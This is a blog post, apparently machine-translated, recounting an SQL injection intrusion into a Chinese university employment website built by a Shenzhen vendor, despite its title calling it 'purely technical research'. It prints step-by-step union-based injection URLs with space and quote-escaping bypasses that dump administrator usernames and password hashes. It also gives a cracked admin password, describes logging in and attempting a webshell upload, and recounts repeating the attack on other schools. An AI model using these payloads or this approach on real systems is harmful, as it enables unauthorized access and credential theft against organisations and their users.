2012 SQL Injection (purely technical research, non-aggressive behavior)

1.   Collect information

It took a long time to browse job.xxx.edu.cn , here only to write some information behind the invasion will be used, this site is a technology company in Shenzhen, in the homepage of the Login window part of the three kinds of personnel, respectively, are employing units, graduates and administrators.

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M00/77/AD/wKioL1ZrpBryNAvfAABUShPOSdY749.png "style=" float: none; "title=" 1.png "alt=" Wkiol1zrpbrynavfaabushposdy749.png "/>

Use Acunetix Scan job. xxx.edu.cn , sweep out the /index_department.php Page exists SQL injection vulnerabilities.

650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/77/AE/wKiom1ZrpBnCt5kzAAB3BNlGiZs143.png "style=" float: none; "title=" 2.png "alt=" Wkiom1zrpbnct5kzaab3bnlgizs143.png "/>

Although Acunetix Scan out dep_id and the Gradyear two parameters are present SQL injection of the vulnerability, but later actually tested, only dep_id can be exploited.

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M02/77/AD/wKioL1ZrpLeScrdXAAAoin8TkIc011.png "style=" float: none; "title=" 3.png "alt=" Wkiol1zrplescrdxaaaoin8tkic011.png "/>

Acunetix also scanned the presence of phpinfo.php files, you can see that PHP is 5.2.10 version,the MAGIC_QUOTES_GPC option is open, This means that special symbols, such as ' ( single quotation mark ),"(double number ), \ ( backslash ), white space character, and so on, are escaped.

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/77/AE/wKiom1ZrpLaSyhfYAABujgwFn_c997.png "style=" float: none; "title=" 4.png "alt=" Wkiom1zrplasyhfyaabujgwfn_c997.png "/>

2.   Exploiting Vulnerabilities

from the error message, you can see that the background database is MySQL.

Http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=1 ""

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/77/AE/wKiom1ZrpLmQ8ppBAAB43kOtNII595.png "style=" float: none; "title=" 5.png "alt=" Wkiom1zrplmq8ppbaab43kotnii595.png "/>

use the ORDER by statement to guess the number of columns, when 4 is correct 5 when the error indicates that there are 4 columns, because the space will be escaped, here use the comment symbol /**/ instead of spaces, Using the # sign to comment out the statement, the ASCII value of the # is used here because the # number is interpreted as a space directly in the browser .

Http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/order/**/by/**/5%23

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M00/77/AD/wKioL1ZrpL6SJQOIAABlYHkN2w4581.png "style=" float: none; "title=" 6.png "alt=" Wkiol1zrpl6sjqoiaablyhkn2w4581.png "/>

View what databases are in MySQL, this is the system database Information_schema that was added after the MySQL5.0 version. You can see that there is only one job_xxx database except Information_schema .

Http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,schema_name,3,4/**/from/**/information_schema. Schemata/**/%23

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/77/AD/wKioL1ZrpL_hXJwAAAASNBFxi7I481.png "style=" float: none; "title=" 7.png "alt=" Wkiol1zrpl_hxjwaaaasnbfxi7i481.png "/>

job_xxx char function bypass, a string of numbers in parentheses is job_xxx corresponding to the ascii

Http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema. Tables/**/where/**/table_schema/**/=/**/char (106,111,98,95,...) /**/%23

650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M02/77/AE/wKiom1ZrpL2D3dGuAAAcsm7epPE990.png "style=" float: none; "title=" 8.png "alt=" Wkiom1zrpl2d3dguaaacsm7eppe990.png "/>

There are several user-related tables in the JOB_XXX database: School_user,com_users,std_bases, when you see these tables, you may feel that the corresponding three users are corresponding to the login window.

See which columns are in the School_user table.

Http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/ Table_name/**/=/**/char (115,99,104,111,111,108,95,117,115,101,114)/**/%23

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M01/77/AE/wKiom1ZrpL3AVZSrAAAWqkV5qrk610.png "style=" float: none; "title=" 9.png "alt=" Wkiom1zrpl3avzsraaawqkv5qrk610.png "/>

See the exciting user_name and user_password, check it out!

Http://job.xxx.edu.cn/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find= &dep_id=100/**/union/**/select/**/1,user_name,user_password,4/**/from/**/school_user%23

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/77/AE/wKiom1ZrpL6SBaoPAAAlhCUQTWE635.png "style=" float: none; "title=" 10.png "alt=" Wkiom1zrpl6sbaopaaalhcuqtwe635.png "/>

This table is the Administrator account information, the first one is the highest authority Admin , the password is MD5 encrypted, in cmd5.com The password found on the website is yuwei162372 , use this username and password to successfully log in to the system.

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M01/77/AE/wKiom1ZrpL6QB-ntAABA4pjrf5E339.png "style=" float: none; "title=" 11.png "alt=" Wkiom1zrpl6qb-ntaaba4pjrf5e339.png "/>

at this point, you can already get the user name and password for all users. I would like to further upload webshell Control the entire server, but uploaded files are removed the suffix name, had to give up.

3.  Expand your victories

During the gathering of information, it was known that the site was developed by a technology company in Shenzhen and that the company's system was also used by many other schools on the company's homepage. In addition, in the Online counseling section of the school employment website, the software uses the school's questions, which is the list of schools.

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M01/77/AD/wKioL1ZrpMLDHQ0QAABDdl6Xdig986.png "style=" float: none; "title=" 12.png "alt=" Wkiol1zrpmldhq0qaabddl6xdig986.png "/>

take xxx Normal University as an example, the invasion process is basically the same, only when checking the user table encountered a coding problem,Google after easy to solve.

http://xxx.yyy.com/index_department.php?gradyear=2012&self_action=1&action_code=0&name_find=& Dep_id=100/**/union/**/select/**/1,binary (user_name), binary (user_password), 4/**/from/**/school_user%23

650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M00/77/AD/wKioL1ZrpMLjFXyxAAAlLSdzZSk934.png "style=" float: none; "title=" 13.png "alt=" Wkiol1zrpmljfxyxaaallsdzzsk934.png "/>

4.  Summary

in the exploit phase, because single quotes are escaped, the constructed in SQL statements , it takes time to check the ASCII value of each character of a string using the char function plus the ASCII value , sometimes replacing the string with some functions. For example , database () instead of Job_cqupt.

in the confirmation After the SQL Injection vulnerability can be exploited, tools can be used to improve the efficiency of intrusions, such as Havij,pangolin , and so on.

650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M00/77/AF/wKiom1ZrpMORd8J4AAGNA1zGXpw194.png "style=" float: none; "title=" 14.png "alt=" Wkiom1zrpmord8j4aagna1zgxpw194.png "/>

       

In the course of this invasion, we found some good information, also recorded here:

• the The Web applicationhackers ' Handbook (Chinese version of the hacker attack and defense technology treasure · Web "), a comprehensive analysis of Web application security holes, definitely worth a look at the good book.

• The Dark Group Forum's detailed MySQL inject ", very detailed good text, do not make the time to read a few more times this article, to see if it is missing something.

• the SQL injection with MySQL "and" Advanced SQL Injectionwith MySQL "Security Angel" by the security organization. Angel written, very old article but the principle is very clear.

This article from "Quiterr" blog, declined reprint!

2012 SQL Injection (purely technical research, non-aggressive behavior)